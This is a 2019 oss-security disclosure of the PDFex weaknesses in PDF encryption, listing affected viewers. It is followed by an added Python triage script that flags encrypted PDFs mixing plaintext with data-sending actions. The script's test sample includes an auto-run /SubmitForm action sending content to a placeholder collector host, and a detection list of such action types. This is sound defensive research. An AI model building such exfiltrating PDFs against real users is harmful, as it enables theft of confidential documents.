Message-ID: <eec1e835-fd6c-5c7c-25b8-5684ce8efafc@rub.de>
Date: Tue, 1 Oct 2019 10:48:07 +0200
From: Jens Müller <jens.a.mueller@....de>
To: oss-security@...ts.openwall.com
Subject: PDFex: Security weakness in PDF encryption

TL;DR

In the scope of academic research at Ruhr University Bochum and Münster University of Applied Sciences, Germany, two severe flaws in the PDF encryption standard have been discovered, both of which lead to full plaintext exfiltration in an active-attacker scenario.

* Website, including proof-of-concept exploits: pdf-insecurity.org
* Paper: pdf-insecurity.org/download/paper-pdf_encryption-ccs2019.pdf

*How to break PDF Encryption*
-----------------------------

To guarantee confidentiality, PDF files can be encrypted. This enables the secure transfer and storage of sensitive documents without any further protection mechanisms. The key management between the sender and recipient may be password based (the recipient must know the password used by the sender, or it must be transferred to them through a secure channel) or public key based (i.e., the sender knows the X.509 certificate of the recipient).

In this research, we analyze the security of encrypted PDF documents and show how an attacker can exfiltrate the content without having the corresponding keys.

*So what is the problem?*
-------------------------

The security problems known as "PDFex" can be summarized as follows:

* 1. Even without knowing the corresponding password, an attacker possessing an encrypted PDF file can manipulate parts of it. More precisely, the PDF specification allows the mixing of ciphertexts with plaintexts. In combination with further PDF features which allow the loading of external resources via HTTP, the attacker can run direct exfiltration attacks once a victim opens the file.

* 2. PDF encryption uses the Cipher Block Chaining (CBC) encryption mode with no integrity checks, which implies ciphertext malleability. This allows an attacker to create self-exfiltrating ciphertext using CBC malleability gadgets. We use this technique not only to modify existing plaintext but to construct entirely new encrypted objects.

*How bad is it?*
----------------

In order to measure the impact of the vulnerabilities in the PDF specification, we analyzed 27 widely used PDF viewers. We found 23 of them (85%) to be vulnerable to direct exfiltration attacks and all of them to be vulnerable to CBC gadgets. You can find the detailed results of our evaluation below.

Application           Version tested   Direct Exfiltration   CBC Gadgets
-----------------------------------------------------------------------
Adobe Acrobat DC      2019.008.20081   [XX]                  [X]
Foxit Reader          9.2.0.9297       [X]                   [X]
PDF-XChange Viewer    2.5.322.9        [XX]                  [X]
Perfect PDF Reader    8.0.3.5          [XX]                  [XX]
PDF Studio Viewer     2018.1.0         [XX]                  [XX]
Nitro Reader          5.5.9.2          [X]                   [XX]
Acrobat Pro DC        2017.011.30127   [XX]                  [X]
Foxit PhantomPDF      9.5.0.20723      [X]                   [X]
PDF-XChange Editor    7.0.326.1        [XX]                  [X]
Perfect PDF Premium   10.0.0.1         [XX]                  [XX]
PDF Studio Pro        12.0.7           [XX]                  [XX]
Nitro Pro             12.2.0.228       [XX]                  [XX]
Nuance Power PDF      3.0.0.17         [XX]                  [X]
iSkysoft PDF Editor   6.4.2.3521       [X]                   [X]
Master PDF Editor     5.1.36           [XX]                  [XX]
Soda PDF Desktop      11.0.16.2797     [X]                   [X]
PDF Architect         7.0.23.3193      [X]                   [X]
PDFelement            6.8.0.3523       [X]                   [X]
-----------------------------------------------------------------------
Preview               3.32.0           -                     [X]
Skim                  1.4.37           -                     [X]
-----------------------------------------------------------------------
Evince                10.0.944.4       [X]                   [X]
Okular                1.7.3            [X]                   [X]
MuPDF                 1.14.0           [X]                   [X]
-----------------------------------------------------------------------
Chrome                70.0.3538.67     [XX]                  [XX]
Firefox               66.0.2           -                     [X]
Safari                11.0.3           -                     [X]
Opera                 57.0.3098.106    [XX]                  [XX]
-----------------------------------------------------------------------
[XX] | Insecure: Exfiltration (no user interaction)
[X]  | Insecure: Exfiltration (with user interaction)
-    | Secure: No exfiltration / not vulnerable

*How can I protect myself?*
---------------------------

We strictly followed the responsible disclosure procedure by reporting the results on the 17th of May 2019. In cooperation with the BSI-CERT, we contacted all vendors, provided proof-of-concept exploits, and helped them to mitigate the issues.

*Who uses PDF Encryption?*
--------------------------

PDF encryption is deployed in many areas to securely exchange confidential information via the Internet. Various medical IT systems and devices are capable, for example, of encrypting and transferring medical records as PDF files. MFPs also provide PDF encryption to protect scanned documents. In business environments, emails are sometimes sent as encrypted PDF documents when other encryption methods are not available (e.g., various organizations use special gateways to automatically encrypt email messages as encrypted PDF attachments).
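An added triage check, not part of the original post or the authors' proof-of-concept tooling, for the two preconditions described under "So what is the problem?": plaintext mixed into an encrypted PDF (crypt filters set to /Identity, or a readable URL literal where strings should be ciphertext) together with an action type that can carry document content to a server. The sample documents are constructed, the domain collector.example is a placeholder, and the regex approach is a heuristic for a mail gateway or incident triage rather than a PDF parser.

```python
import re

# Action types that make a viewer send data out or run logic on open / submit
# (standard PDF 32000-1 action names; their presence alone is not suspicious).
ACTION_KEYS = (b"/SubmitForm", b"/URI", b"/Launch", b"/GoToR", b"/JavaScript", b"/ImportData")

def assess_encrypted_pdf(data: bytes) -> dict:
    """Triage raw PDF bytes for the PDFex preconditions: plaintext mixed into
    an encrypted document plus an action that can carry content to a server.
    Regex-based heuristic (assumption: no object streams), not a PDF parser."""
    report = {"identity_filters": [], "plaintext_urls": [], "actions": [], "verdict": "ok"}
    if not re.search(rb"/Encrypt\b", data):      # \b keeps /EncryptMetadata from matching
        report["verdict"] = "not encrypted"
        return report
    # Crypt filters set to Identity leave whole object classes (streams, strings,
    # embedded files) unencrypted; with /V 4 or 5 an absent /StmF or /StrF defaults to Identity.
    for key in (b"/StmF", b"/StrF", b"/EFF"):
        if re.search(key + rb"\s*/Identity\b", data):
            report["identity_filters"].append(key.decode() + " explicit")
        elif key != b"/EFF" and re.search(rb"/V\s*[45]\b", data) and not re.search(key + rb"\b", data):
            report["identity_filters"].append(key.decode() + " absent (defaults to Identity)")
    # A per-stream /Crypt filter naming /Identity exempts just that stream from encryption.
    if re.search(rb"/Crypt\b.{0,200}?/Name\s*/Identity\b", data, re.S):
        report["identity_filters"].append("per-stream /Crypt /Identity")
    # Encrypted strings are opaque bytes; a readable URL literal is plaintext mixed in.
    report["plaintext_urls"] = [u.decode() for u in re.findall(rb"\((https?://[^)\s]+)\)", data)]
    report["actions"] = [k.decode() for k in ACTION_KEYS if re.search(re.escape(k) + rb"\b", data)]
    if (report["identity_filters"] or report["plaintext_urls"]) and report["actions"]:
        report["verdict"] = "suspicious"
    return report

# Constructed minimal documents (no real ciphertext); only the structure matters.
MIXED = (b"%PDF-1.7\n1 0 obj << /Type /Catalog /OpenAction 4 0 R >> endobj\n"
         b"4 0 obj << /S /SubmitForm /F (http://collector.example/upload) /Flags 4 >> endobj\n"
         b"trailer << /Encrypt << /Filter /Standard /V 4 /CF << /StdCF << /CFM /AESV2 >> >>"
         b" /StmF /StdCF /StrF /Identity >> >>\n%%EOF\n")
CLEAN = (b"%PDF-1.7\n1 0 obj << /Type /Catalog >> endobj\n"
         b"5 0 obj << /S /URI /URI <9fa02c31e7> >> endobj\n"
         b"trailer << /Encrypt << /Filter /Standard /V 4 /CF << /StdCF << /CFM /AESV2 >> >>"
         b" /StmF /StdCF /StrF /StdCF >> >>\n%%EOF\n")

if __name__ == "__main__":
    for name, doc in (("mixed", MIXED), ("clean", CLEAN)):
        print(name, assess_encrypted_pdf(doc))
```

A "suspicious" verdict only means the document should be inspected or quarantined before a viewer opens it; the check cannot tell a malicious edit from a sloppily generated file.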